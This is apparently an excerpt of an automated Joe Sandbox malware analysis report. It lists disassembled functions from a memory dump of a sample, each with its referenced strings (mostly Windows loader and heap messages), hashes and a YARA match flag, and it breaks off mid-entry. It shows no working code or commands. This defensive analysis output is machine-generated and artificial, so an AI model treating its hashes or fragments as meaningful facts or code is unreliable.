                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: $@
                                                          • API String ID: 2994545307-1077428164
                                                          • Opcode ID: 54d1b6732ac962dbc734d1b9c060b332ca1d5f52a08f353247a1ff07620765cd
                                                          • Instruction ID: 8070829215b1bf8fe26335222490d9bd1e9763a0453f667387a41368d39c828e
                                                          • Opcode Fuzzy Hash: 54d1b6732ac962dbc734d1b9c060b332ca1d5f52a08f353247a1ff07620765cd
                                                          • Instruction Fuzzy Hash: 2FC280B16083419FE765CF28C980BABBBE5BF89714F04896DF9C987241E735D844CB62
                                                          Function 0101A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          • Opcode ID: b5aad50457b054e381829809e6b88fbcbd31b33cb3ff2a456bb539a2e8d24714
                                                          • Instruction ID: f53bddf8eba6613ee0e23d8ea55d7073c2b114efea3b853a21fcc8a5249314ee
                                                          • Opcode Fuzzy Hash: b5aad50457b054e381829809e6b88fbcbd31b33cb3ff2a456bb539a2e8d24714
                                                          • Instruction Fuzzy Hash: ABA17F71D1122A9BEB31DF68CD88BEAB7B8EF44700F0041EAE949A7250D7359E84CF54
                                                          Function 01040BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Failed to allocated memory for shimmed module list, xrefs: 0108A10F
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0108A121
                                                          • LdrpCheckModule, xrefs: 0108A117
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-161242083
                                                          • Opcode ID: 87b52f3686ce3672b46677836dec3fd9946f86b624ba1d0542deadbda8e74204
                                                          • Instruction ID: 2a6151d4e69a2e23f0f047cc2cceff3c999a4bda01d94a806b0d2bbd71704652
                                                          • Opcode Fuzzy Hash: 87b52f3686ce3672b46677836dec3fd9946f86b624ba1d0542deadbda8e74204
                                                          • Instruction Fuzzy Hash: 7A71E2B0A0020ADFDB29EF68C980AEEB7F4FB44304F14407DE992A7655D774A981CB54
                                                          Function 01030A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-1334570610
                                                          • Opcode ID: cdfb2550545b29803fea3a2f8e3c7e3d79752c3c196c753d350cd9ea3b22de29
                                                          • Instruction ID: 4d41d1d6cc4aad4e43bd4378a8e39d0f9200b25478e1bed491e69fda5f7db09b
                                                          • Opcode Fuzzy Hash: cdfb2550545b29803fea3a2f8e3c7e3d79752c3c196c753d350cd9ea3b22de29
                                                          • Instruction Fuzzy Hash: 1E610270605305DFDB29DF28C840BAABBE5FF85304F1485A9E4D98F29AD770E881CB91
                                                          Function 0105C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 010982DE
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010982E8
                                                          • Failed to reallocate the system dirs string !, xrefs: 010982D7
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          • Opcode ID: 71d7eef58f66d9cdd6744dbc8c298816916caff0320a3d6a1f911cb94fc7ce3a
                                                          • Instruction ID: 1e1ef166de3cedc577f33a5fa193b5355213ba80ba1d107e3a669c5b5fb7c0e2
                                                          • Opcode Fuzzy Hash: 71d7eef58f66d9cdd6744dbc8c298816916caff0320a3d6a1f911cb94fc7ce3a
                                                          • Instruction Fuzzy Hash: 1241EFB1504309ABD765EB68DA44B9BB7E8FF48B50F00493AF9A4D7294E770E840CB91
                                                          Function 010DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010DC1C5
                                                          • @, xrefs: 010DC1F1
                                                          • PreferredUILanguages, xrefs: 010DC212
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          • Opcode ID: 6104ada44cc48f715680f14ecc043d36a7020e6ab58c935b3ee201b04bd30662
                                                          • Instruction ID: bc1af31c153b50f8e9dfd3dbb58441acbb756fa50117ad4fc641619283c008bb
                                                          • Opcode Fuzzy Hash: 6104ada44cc48f715680f14ecc043d36a7020e6ab58c935b3ee201b04bd30662
                                                          • Instruction Fuzzy Hash: 91416171E00309EBEB51DAD8C981BEEBBFDAB54700F14416AE689B7284D7749E44CB50
                                                          Function 010B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          • Opcode ID: ae35ff4b9cc27a298010d3251c86da4099738e5063587642c8f9d6b09df8405c
                                                          • Instruction ID: 99554143ceaf04495c9d280f77728ae0595f511aeb07f20d202e4204de52a781
                                                          • Opcode Fuzzy Hash: ae35ff4b9cc27a298010d3251c86da4099738e5063587642c8f9d6b09df8405c
                                                          • Instruction Fuzzy Hash: 5241E4719006598BEB25DB98D884BEDBBF8FF55340F1408A9D982EF792D6349A01CB50
                                                          Function 010A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 010A4888
                                                          • LdrpCheckRedirection, xrefs: 010A488F
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 010A4899
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          • Opcode ID: ba428cacbcf6e62cecc1335293d680e9c77895816bb13fc0ec38a492d714e348
                                                          • Instruction ID: a472554cba1e1b354912e4c671926a18a8f592c567fe498d97bae61b6da8174b
                                                          • Opcode Fuzzy Hash: ba428cacbcf6e62cecc1335293d680e9c77895816bb13fc0ec38a492d714e348
                                                          • Instruction Fuzzy Hash: 8241D33AA047919FCB61CE98E940A6EBBE5FF49A50B4901A9EDD5D7251D3B0E800CB81
                                                          Function 01030BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-2558761708
                                                          • Opcode ID: 5bb63a199c5f09e219c811edfa39bc8a0bb8a4b198cd22e8f7855f972bdfd861
                                                          • Instruction ID: d994440bf35364dcde6f875246764512a978cb58a9ee25a94758c74d60b6fb8d
                                                          • Opcode Fuzzy Hash: 5bb63a199c5f09e219c811edfa39bc8a0bb8a4b198cd22e8f7855f972bdfd861
                                                          • Instruction Fuzzy Hash: CC11D23131A5029FDB5DDA18C841BBAB3A9EF80619F1881A9F4C6CB259DF34D841C751
                                                          Function 010A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Process initialization failed with status 0x%08lx, xrefs: 010A20F3
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010A2104
                                                          • LdrpInitializationFailure, xrefs: 010A20FA
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2986994758
                                                          • Opcode ID: 1315712f899e7b4dc7be8344868dca51dae1c5dd65afc6cdabe56080e2eb0f70
                                                          • Instruction ID: 978f8eec0f9a646a80152d39f0140fb6154b7c05ab4639db0a7254a9a54ff69e
                                                          • Opcode Fuzzy Hash: 1315712f899e7b4dc7be8344868dca51dae1c5dd65afc6cdabe56080e2eb0f70
                                                          • Instruction Fuzzy Hash: 44F02835640309ABE724D64CDD46F9577A8EB41B14F900068F7806B2C5D5B0A940C741
                                                          Function 010303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          • API String ID: 48624451-232158463
                                                          • Opcode ID: 8a470dadfa99e1dcb9477176955282972cf00d7438a39682d364b74774d70fd2
                                                          • Instruction ID: 43b0f46a52941a112851445603fbd1e2e9c5befabae8d1bc2e5ee5439ff7022d
                                                          • Opcode Fuzzy Hash: 8a470dadfa99e1dcb9477176955282972cf00d7438a39682d364b74774d70fd2
                                                          • Instruction Fuzzy Hash: D9715D71A0024A9FDB05EF98D994FEEB7F8BF48304F144065E985EB251EA34EE01CB60
                                                          Function 0102A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrResSearchResource Enter, xrefs: 0102AA13
                                                          • LdrResSearchResource Exit, xrefs: 0102AA25
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                          • API String ID: 0-4066393604
                                                          • Opcode ID: 5a497eff2be2635a569ba906e21199c00cacfeca745b45aaabdf590f2b241d19
                                                          • Instruction ID: 6eab923b05b46d18760dbba067b5ad684cf1644f78c6173e57e8b3f5a2f28957
                                                          • Opcode Fuzzy Hash: 5a497eff2be2635a569ba906e21199c00cacfeca745b45aaabdf590f2b241d19
                                                          • Instruction Fuzzy Hash: A6E18E71F04229DFEF22DA98C980BEEBBB9BF44710F104466E981EB652DB34D941CB50
                                                          Function 010EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction ID: 70ab48902953deab7d3964e8deb6b4a39dc5b6d60ae25f9a062e40fee1fd6d4b
                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction Fuzzy Hash: 40C1AE713043429FEB24CE2AC849B6BBBE5AFD8318F084A2DF6D68B290D775D505CB51
                                                          Function 0109E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: 5ae7029f8f5809a29bf6ac7a21c97fd09ce9d052de44cdf5f23014bd36d029d6
                                                          • Instruction ID: bbb48b4de70e70cf168a3f6bdc54cc8e34c133ce842aa03e3aa6d6ce6081bc0a
                                                          • Opcode Fuzzy Hash: 5ae7029f8f5809a29bf6ac7a21c97fd09ce9d052de44cdf5f23014bd36d029d6
                                                          • Instruction Fuzzy Hash: 9A614971E006199FEB25DFA8C850BAEBBB9FB48740F14406DE689EB291D731AD40DB50
                                                          Function 010C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MUI
                                                          • API String ID: 0-17815947
                                                          • Opcode ID: 48983292680b177eb19293a3996409ccc8ae1ce47811b3225c26e903298329e0
                                                          • Instruction ID: 79df66843ad1e8f1ea9088b7bf5a1b0a2a83b0e6eadb63248905c52d5ce37859
                                                          • Opcode Fuzzy Hash: 48983292680b177eb19293a3996409ccc8ae1ce47811b3225c26e903298329e0
                                                          • Instruction Fuzzy Hash: CD5117B1E0021DAEDB11DFA9CC90AEEBBBCFB54B54F100529E651F7291D7319A05CBA0
                                                          Function 010204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • kLsE, xrefs: 01020540
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0102063D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          • API String ID: 0-2547482624
                                                          • Opcode ID: 7759c84faa74ed76c215c4f45527568725d8ec7b97665086d2c88e20bd37daf7
                                                          • Instruction ID: 37a8afb9ae548fdefdbb31ebbe649fc8cfe086c78c8503d99a35552b526b817e
                                                          • Opcode Fuzzy Hash: 7759c84faa74ed76c215c4f45527568725d8ec7b97665086d2c88e20bd37daf7
                                                          • Instruction Fuzzy Hash: 3551CC716047568BD734EF28C5486A7BBE4AF88304F10883EFAEA87645E770E545CB92
                                                          Function 0102A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0102A309
                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0102A2FB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                          • API String ID: 0-2876891731
                                                          • Opcode ID: 3463eda6e005921c14f2111d165ded78482d48cf080ddc3ecb53d525619cfdb2
                                                          • Instruction ID: 8537ce0cab50d4cdd65f2206fa61842405307141e488c80020f22c4be0712823
                                                          • Opcode Fuzzy Hash: 3463eda6e005921c14f2111d165ded78482d48cf080ddc3ecb53d525619cfdb2
                                                          • Instruction Fuzzy Hash: 9B418B30B05669DBDB219F59C884BAE7BF4BF84700F1480A5E9C4DB692EAB5D940CB50
                                                          Function 0105A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Cleanup Group$Threadpool!
                                                          • API String ID: 2994545307-4008356553
                                                          • Opcode ID: 3b71e89c976cf760f7f2c9f3eacee24fdd775313c2557afb81e44581e73d6314
                                                          • Instruction ID: 8fdc73a1d56d1acc60786e901f884e1889b9c4f64134ebb2c1520ac386a060c7
                                                          • Opcode Fuzzy Hash: 3b71e89c976cf760f7f2c9f3eacee24fdd775313c2557afb81e44581e73d6314
                                                          • Instruction Fuzzy Hash: AD01F4B2240704EFD361DF24CE45F2677E8EB98B15F018A39AA98C7190E3B4D804CB56
                                                          Function 0102C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          • Opcode ID: 41c6581c8ad21e1551972738338c516de8fac4165a2cdffea5138833cada7702
                                                          • Instruction ID: c03c067ede9636bcef11253f8459b37accd791685a11070423cbbba43edfb120
                                                          • Opcode Fuzzy Hash: 41c6581c8ad21e1551972738338c516de8fac4165a2cdffea5138833cada7702
                                                          • Instruction Fuzzy Hash: F0826175E002298FEB65CFA9C9807EDBBB5BF48310F1481A9E999AB351DB309D41CF50
                                                          Function 010A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 09811f5d865d42c7c5b598aabb1c491e54a03eefe5dc33fbef2cd10352951373
                                                          • Instruction ID: 2b2cf7ac6cd0f2e5174420c96d723c721c38f6a877d5d774b7c120b6a40ffc45
                                                          • Opcode Fuzzy Hash: 09811f5d865d42c7c5b598aabb1c491e54a03eefe5dc33fbef2cd10352951373
                                                          • Instruction Fuzzy Hash: 889162B1A00219AFEB21DF95CD85FEEBBB8EF58750F544065F640AB190D775AD00CBA0
                                                          Function 010CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 83e2526af51390e22332878f7111be6bbf8bc8ff604ce6bf845397bbdc625f39
                                                          • Instruction ID: 817c54943ac6043d4daf68c184421c85576d08f14e5b2b0440e11f29b941324e
                                                          • Opcode Fuzzy Hash: 83e2526af51390e22332878f7111be6bbf8bc8ff604ce6bf845397bbdc625f39
                                                          • Instruction Fuzzy Hash: 29918272900609AFDB22AB95DC84FEFBFBAEF85B50F104029F581A7251D775A901CB50
                                                          Function 0105A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          • Opcode ID: a0a7bbd5268dda868512a8dd6a7a35099f81622003ad0990fde80d3f3950b424
                                                          • Instruction ID: 5ad30786bfa380a591aecec02f516f54560d0b96ae335a448af648779a376e3b
                                                          • Opcode Fuzzy Hash: a0a7bbd5268dda868512a8dd6a7a35099f81622003ad0990fde80d3f3950b424
                                                          • Instruction Fuzzy Hash: FC716175E0020ADFDF68CF98D5A06EEBBF1BF48700F14816EE585AB241E7329941DB50
                                                          Function 010C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .mui
                                                          • API String ID: 0-1199573805
                                                          • Opcode ID: d764b46b6cdc9a2d9237df26fc534607cc38b3a52cce36913e335509915dd1cd
                                                          • Instruction ID: d33c8578107c0ccf0c97a36ce0faee7fc03e1e1e1ad1234ad21f4ced0752d622
                                                          • Opcode Fuzzy Hash: d764b46b6cdc9a2d9237df26fc534607cc38b3a52cce36913e335509915dd1cd
                                                          • Instruction Fuzzy Hash: 4F518D72D0022ADBDB10DF99C850AEEBBB4BF18E50F05416EEA91FB250D7349801CFA4
                                                          Function 0103E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          • Opcode ID: ec1440d7ac2926e73fb203a08b1e793bf70dcfb66f69436618ae7206e799f91c
                                                          • Instruction ID: 4a75edd26c6b6eb4885b1b4aac3d3029916fea561ee380eb41a8fccb58d65487
                                                          • Opcode Fuzzy Hash: ec1440d7ac2926e73fb203a08b1e793bf70dcfb66f69436618ae7206e799f91c
                                                          • Instruction Fuzzy Hash: C3418D725083069BD722DA75C980BAFBBECBFC8714F440A69FAC4E7180E774D9048796
                                                          Function 0109C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: bcc8cd10465381a5c75a9e8d280c29bb663b3572b89c4d91cae373df2b34905e
                                                          • Instruction ID: 2fad0e4201db57f97192566e1ad9acc09bb72a90d574976ddee5d6bcf62efa33
                                                          • Opcode Fuzzy Hash: bcc8cd10465381a5c75a9e8d280c29bb663b3572b89c4d91cae373df2b34905e
                                                          • Instruction Fuzzy Hash: 464142B1D0052DAEEF21DB50CD94FDEB77CAB44714F0045E5AA48AB140DB709E899FA4
                                                          Function 00407A10 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -
                                                          • API String ID: 0-2547889144
                                                          • Opcode ID: 9cd9b2843a4d122925b14fda585fd6a230e6186cbfba177f1a28c4fc4df2e380
                                                          • Instruction ID: 302fee31b191d8e3669ac91798836b62296f2d81a71514bf1940ec77ba6f724f
                                                          • Opcode Fuzzy Hash: 9cd9b2843a4d122925b14fda585fd6a230e6186cbfba177f1a28c4fc4df2e380
                                                          • Instruction Fuzzy Hash: 5131ED33A1C34D8FCB114E3CDD825ADFF60FB1B224B2403AED482A7182D226D5878786
                                                          Function 010B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 851953735addae23791a6c5ae8b343533766371047a97708908d028667a24ca2
                                                          • Instruction ID: f0b64dc16a114ea129f933020c9448f8d99e6a1ff6bc75330b431f780c03f347
                                                          • Opcode Fuzzy Hash: 851953735addae23791a6c5ae8b343533766371047a97708908d028667a24ca2
                                                          • Instruction Fuzzy Hash: 45311631A0071D9BEB22DB69C890BFEBBF8DF55704F144068E981AB282C776EC45CB54
                                                          Function 0109CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          • API String ID: 0-215506332
                                                          • Opcode ID: 10ff7962527043baba14f6a90eca2b138a51e12ea34ca705b2e42481996cd8bb
